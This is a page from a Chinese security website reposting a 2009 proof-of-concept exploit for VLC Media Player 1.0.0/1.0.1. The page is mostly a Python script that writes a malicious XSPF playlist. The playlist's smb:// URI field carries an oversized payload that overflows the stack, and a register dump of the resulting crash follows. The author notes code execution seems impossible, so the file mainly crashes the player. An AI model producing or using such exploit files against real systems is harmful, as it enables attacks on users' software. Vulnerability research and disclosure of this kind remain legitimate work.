首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 VLC Media Player 1.0.0/1.0.1 smb:// URI Handling BOF PoC 来源：www.vfcocus.net 作者：Dr_IDE 发布时间：2009-08-14   #!/usr/bin/env python ############################################################################ # # VLC Media Player 1.0.0\1.0.1 smb:// URI Handling Remote Stack Overflow PoC # Found By: Dr_IDE # Tested: Windows XP SP2 , XP SP3 and Windows 7 RC1 # Thanks: Pankaj Kohli for finding this in 0.8.6f # Original: http://www.milw0rm.com/exploits/9303 # ############################################################################ # Crash Breakdown of vlc v1.0.1 on XP SP2/SP3 """ EAX FFFFFFFE ECX 42424242 <---- Bytes 3-6 of our payload EDX 00000000 EBX 42424242 <---- Bytes 3-6 of our payload ESP 02CBF694 EBP 02CBF7C4 ESI 61CC8324 libacc_4.61CC8324 EDI 61CC8323 libacc_4.61CC8323 EIP 77C478AC msvcrt.77C478AC C 0  ES 0023 32bit 0(FFFFFFFF) P 0  CS 001B 32bit 0(FFFFFFFF) A 0  SS 0023 32bit 0(FFFFFFFF) Z 0  DS 0023 32bit 0(FFFFFFFF) S 0  FS 003B 32bit 7FFAC000(FFF) T 0  GS 0000 NULL D 0 O 0  LastErr ERROR_MOD_NOT_FOUND (0000007E) EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G) ST0 empty -UNORM FB18 77C2C3E7 00E128A0 ST1 empty +UNORM 2088 00000000 00000000 ST2 empty %#.19L ST3 empty -??? FFFF 00000000 77C2C42E ST4 empty 0.9999999999999289457 ST5 empty %#.19L ST6 empty 0.9999999999999289457 ST7 empty 0.5000000000000000000                3 2 1 0      E S P U O Z D I FST 0020  Cond 0 0 0 0  Err 0 0 1 0 0 0 0 0  (GT) FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1 """ header1 =  ("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n") header1 += ("<playlist version=\"1\" xmlns=\"http://xspf.org/ns/0/\" xmlns:vlc=\"http://www.videolan.org/vlc/playlist/ns/0/\">\n") header1 += ("\t<title>Playlist</title>\n") header1 += ("\t<trackList>\n") header1 += ("\t\t<track>\n") header1 += ("\t\t\t<location>smb://example.com@www.example.com/foo/#{") # Stack Overwrite after first 2 bytes of URI. It seems that you can't put traditional NOP's in here BTW. # Code execution does not seem possible. payload = ("\x41" * 2 + "\x42" * 4 + "\x43" * 10000) header2 =  ("}</location>\n"); header2 += ("\t\t\t<extension application=\"http://www.videolan.org/vlc/playlist/0\">\n"); header2 += ("\t\t\t\t<vlc:id>0</vlc:id>\n"); header2 += ("\t\t\t</extension>\n"); header2 += ("\t\t</track>\n"); header2 += ("\t</trackList>\n"); header2 += ("</playlist>\n"); try:     f1 = open("vlc_1.0.X.xspf","w")     f1.write(header1 + payload + header2)     f1.close()     print("\nExploit file created!\n") except:     print "Error"   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·FTPShell Client 4.1 RC2 Name S ·pIPL 2.5.0 (.PLS /.PL) Univers ·EmbedThis Appweb v3.0B.2-4 Mul ·JBLOG 1.5.1 Remote SQL Table B ·2WIRE Gateway Authentication B ·Wordpress Plugin WP-Syntax <= ·Gazelle CMS 1.0 Multiple Vulne ·Gazelle CMS version 1.0 suffer ·MS Wordpad on winXP SP3 Local ·Safari 4 versions prior to 4.0 ·Easy Music Player 1.0.0.2 (wav ·Linux Kernel 2.x sock_sendpage   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved